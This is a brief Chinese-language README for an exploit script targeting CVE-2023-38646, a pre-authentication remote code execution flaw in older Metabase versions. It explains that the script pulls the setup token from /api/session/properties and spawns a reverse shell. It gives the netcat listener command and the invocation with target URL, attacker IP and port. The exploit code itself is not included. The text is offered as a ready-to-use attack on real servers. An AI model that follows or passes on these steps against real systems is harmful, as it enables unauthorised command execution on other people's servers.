
Metabase Pre-Auth RCE POC
Metabase开源版0.46.6.1之前及Metabase企业版1.46.6.1之前存在漏洞,允许攻击者在服务器上执行任意命令。我直接编写了脚本以在攻击者机器上获取反向shell。
该脚本需要目标URL、攻击者IP和端口。此漏洞利用无需提供设置令牌,因为脚本会尝试从 /api/session/properties 获取它。
确保在攻击者机器上启动netcat监听器,使用以下命令:
nc -nlvp {Port}
运行POC脚本时使用:
python3 CVE-2023-38646.py -u <target-url> -ip <IP> -p <PORT>
